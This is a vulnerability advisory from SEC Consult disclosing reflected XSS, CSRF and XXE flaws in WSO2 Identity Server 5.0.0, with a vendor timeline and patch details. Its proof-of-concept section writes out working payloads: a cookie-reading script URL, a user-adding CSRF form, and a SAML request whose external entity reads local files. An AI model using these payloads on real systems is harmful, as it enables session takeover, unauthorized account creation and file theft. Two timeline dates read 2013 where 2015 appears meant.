SEC Consult Vulnerability Lab Security Advisory < 20150513-0 >
=======================================================================
title: Multiple critical vulnerabilities
product: WSO2 Identity Server
other WSO2 Carbon based products may be affected too
vulnerable version: 5.0.0 (WSO2 Carbon Framework v4.2.0 patch1095)
fixed version: 5.0.0 with patches 1194 and 1095 applied
CVE number:
impact: critical
homepage: http://wso2.com/products/identity-server/
found: 2015-02-19
by: W. Ettlinger (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Berlin - Frankfurt/Main - Montreal - Singapore
Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
=======================================================================
Vendor description:
- -------------------
"WSO2 Identity Server provides sophisticated security and identity management
of enterprise web applications, services, and APIs, and makes life easier for
developers and architects with its hassle-free, minimal monitoring and
maintenance requirements. In its latest version, Identity Server acts as an
Enterprise Identity Bus (EIB) — a central backbone to connect and manage
multiple identities regardless of the standards on which they are based."
URL: http://wso2.com/products/identity-server/
Business recommendation:
- ------------------------
The WSO2 Identity Server has three security vulnerabilities that allow an
attacker to take over administrative user sessions and read arbitrary
local files. Moreover, the XXE vulnerability potentially allows an
attacker to conduct further attacks on internal servers since the
vulnerability may allow an attacker to bypass firewall rules.
SEC Consult only conducted a very quick and narrow check on the
WSO2 Identity Server. Since in this check a critical vulnerability was
found, SEC Consult suspects that the Identity Server contains even
more critical vulnerabilities.
Since other WSO2 products are based on the same framework (WSO2 Carbon
Framework), it is possible that these or similar vulnerabilities affect
other products too.
SEC Consult recommends to not use any products based on the WSO2 Carbon
Framework until a thorough security review has been conducted.
Vulnerability overview/description:
- -----------------------------------
1) Reflected cross-site scripting (XSS, IDENTITY-3280)
The WSO2 Identity Server is vulnerable to reflected reflected cross-site
scripting vulnerabilities. An attacker can lure a victim, that is logged in
on the Identity Server administration web interface, to e.g. click on a link
and take over the victim's session.
2) Cross-site request forgery (CSRF, IDENTITY-3280)
On at least on one web page, CSRF protection has not been implemented. An
attacker on the internet could lure a victim, that is logged in on the
Identity Server administration web interface, on a web page e.g. containing
a manipulated <img> tag. The attacker is then able to add arbitrary users
to the Identity Server.
3) XML external entitiy injection (XXE, IDENTITY-3192)
An unauthenticated attacker can use the SAML authentication interface to
inject arbitrary external XML entities. This allows an attacker to read
arbitrary local files. Moreover, since the XML entity resolver allows
remote URLs, this vulnerability may allow to bypass firewall rules
and conduct further attacks on internal hosts.
Proof of concept:
- -----------------
1) Reflected cross-site scripting (XSS, IDENTITY-3280)
When opening the following URL an alert-box is shown as an example:
http://<host>:9443/carbon/user/change-passwd.jsp?isUserChange=true&returnPath=../userstore/index.jsp%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
When a user without permission to create other users issues the following
request, an alert-box is shown:
- ---- snip ----
POST /carbon/user/add-finish.jsp HTTP/1.1
Host: <host>:9443
Cookie: <cookies>
Content-Type: application/x-www-form-urlencoded
Content-Length: 261
pwd_primary_null=%5E%5B%5CS%5D%7B5%2C30%7D%24&usr_primary_null=%5E%5B%5CS%5D%7B3%2C30%7D%24&pwd_PRIMARY=%5E%5B%5CS%5D%7B5%2C30%7D%24&usr_PRIMARY=%5E%5B%5CS%5D%7B3%2C30%7D%24&domain=PRIMARY&username=secconsult&passwordMethod=defineHere&password=test123&retype=test123
- ---- snip ----
2) Cross-site request forgery (CSRF, IDENTITY-3280)
The following HTML fragment demonstrates this issue:
- ---- snip ----
<form method="POST" action="https://<host>:9443/carbon/user/add-finish.jsp">
<input type="text" name="domain" value="PRIMARY"/>
<input type="text" name="username" value="secconsult"/>
<input type="text" name="password" value="test123"/>
<input type="submit"/>
</form>
- ---- snip ----
3) XML external entitiy injection (XXE, IDENTITY-3192)
After issuing the following request to a vulnerable Windows server,
the contents of the C: drive are returned:
- ---- snip ----
<?xml version="1.0"?>
<!DOCTYPE AuthnRequest [
<!ELEMENT AuthnRequest ANY >
<!ENTITY xxe SYSTEM "file:///C:/" >]>
<samlp:AuthnRequest
xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
Destination="https://<host>/samlsso"
ID="_ffffffff-0000-0000-0000-ffffffffffff"
IssueInstant="2015-01-01T01:01:01Z"
ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST"
Version="2.0">
<saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">
XXXX&xxe;YYYY
</saml:Issuer>
<samlp:NameIDPolicy AllowCreate="true"
Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient"/>
</samlp:AuthnRequest>
- ---- snip ----
Vulnerable / tested versions:
- -----------------------------
The version 5.0.0 (with WSO2 Carbon Framework v4.2.0 patch1095 applied)
was found to be vulnerable. This was the latest version at the time
of discovery.
Vendor contact timeline:
- ------------------------
2015-03-19: Contacting vendor through security () wso2 com
2015-03-19: Security contact confirms retrieval of the E-Mail
2015-03-19: Security contact says that he has trouble opening the attached PDF
document
2015-03-19: Sending Responsible Disclosure Policy in plain text
2015-03-20: Security contact states he actually was unable to decrypt the
advisory
2015-03-22: Sending security advisory again
2015-03-22: Security contact confirms retrieval of the advisory
2015-03-26: Security contact acknowledges existence of the vulnerabilities
2015-04-10: Asking for an update on the current status and which products and
versions are affected
2015-04-10: Security contact: XSS vulnerabilities are fixed in the code,
fixing CSRF is in progress,
Identity Server 5.0.0 is vulnerable
2015-04-13: Asking whether the patches will be release before the latest
possible release date; asking for the status of the XXE
vulnerability and whether other products based on Carbon are
affected
2015-04-13: Advisory can be release on 2013-05-07, release notes will mention
the affected products
2015-05-04: Asking for current status
2015-05-04: Security contact: patches will be released in the next couple of
days
2015-05-05: Security contact asks to delay the release of the advisory to
2013-05-13
2015-05-05: Confirming the new release date
2015-05-05: Asking to give credit in the release notes to the patch
2015-05-13: Public release of the advisory
Solution:
- ---------
Apply the following patches to mitigate these issues:
* WSO2-CARBON-PATCH-4.2.0-1194
* WSO2-CARBON-PATCH-4.2.0-1095
See the following pages for more information:
https://wso2.org/jira/browse/IDENTITY-3280
https://wso2.org/jira/browse/IDENTITY-3192
The patches can be downloaded at
http://wso2.com/products/identity-server/
Workaround:
- -----------
None.
Advisory URL:
- -------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Berlin - Frankfurt/Main - Montreal - Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult